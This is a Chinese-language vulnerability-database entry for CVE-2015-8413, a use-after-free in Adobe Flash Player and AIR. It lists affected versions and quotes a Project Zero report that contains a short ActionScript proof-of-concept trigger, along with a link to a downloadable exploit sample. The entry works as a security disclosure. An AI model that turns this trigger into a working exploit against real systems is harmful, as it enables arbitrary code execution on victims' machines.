多款Adobe产品释放后重用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123162 漏洞类型 其他
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 CVE-2015-8413 CNNVD-ID CNNVD-201512-243
漏洞平台 Windows_x86-64 CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/39043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-243
|漏洞详情
AdobeFlashPlayer、AdobeAIRSDK和AdobeAIRSDK&Compiler都是美国奥多比(Adobe)公司的产品。AdobeFlashPlayer是一款多媒体播放器产品;AdobeAIRSDK和AdobeAIRSDK&Compiler都是适用于AdobeAIR(一个跨操作系统的运行时环境)的标准开发工具包。多款Adobe产品中存在释放后重用漏洞。攻击者可利用该漏洞执行任意代码,控制受影响系统。以下产品及版本受到影响:基于Windows和Macintosh平台的AdobeFlashPlayerDesktopRuntime19.0.0.245及之前版本和AdobeFlashPlayerExtendedSupportRelease18.0.0.261及之前版本,基于Windows、Macintosh、Linux和ChromeOS平台的AdobeFlashPlayerforGoogleChrome19.0.0.245及之前版本,基于Windows10平台的AdobeFlashPlayerforMicrosoftEdgeandInternetExplorer1119.0.0.245及之前版本,基于Windows8.0和8.1平台的AdobeFlashPlayerforInternetExplorer10and1119.0.0.245及之前版本,基于Linux平台的AdobeFlashPlayerforLinux11.2.202.548及之前版本,基于Windows和Macintosh平台的AIRDesktopRuntime19.0.0.241及之前版本,基于Windows、Macintosh、Android和iOS平台的AIRSDK19.0.0.241及之前版本和AIRSDK&Compiler19.0.0.241及之前版本,基于Android平台的AIRforAndroid19.0.0.241及之前版本。
|漏洞EXP
Source: https://code.google.com/p/google-security-research/issues/detail?id=590

There is a use-after-free in Selection.SetSelection. If it is called with a number parameter, which is an object with valueOf defined, and this function frees the parent of the TextField parameter, the object is used after it is freed. A minimal PoC follows:

var mc = this.createEmptyMovieClip("mc", 301);
var myText_txt = mc.createTextField("myText_txt", 302, 1, 1, 100, 100);
myText_txt.text = "this is my text";
Selection.setFocus("myText_txt");
var n = {valueOf : func};
Selection.setSelection(n, 3);

function func(){

  mc.removeMovieClip();
  // Fix heap here
  return 0;

}

A sample swf and fla are attached. Note that this PoC only works on 64-bit platforms.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39043.zip
|参考资料

来源:helpx.adobe.com
链接:https://helpx.adobe.com/security/products/flash-player/apsb15-32.html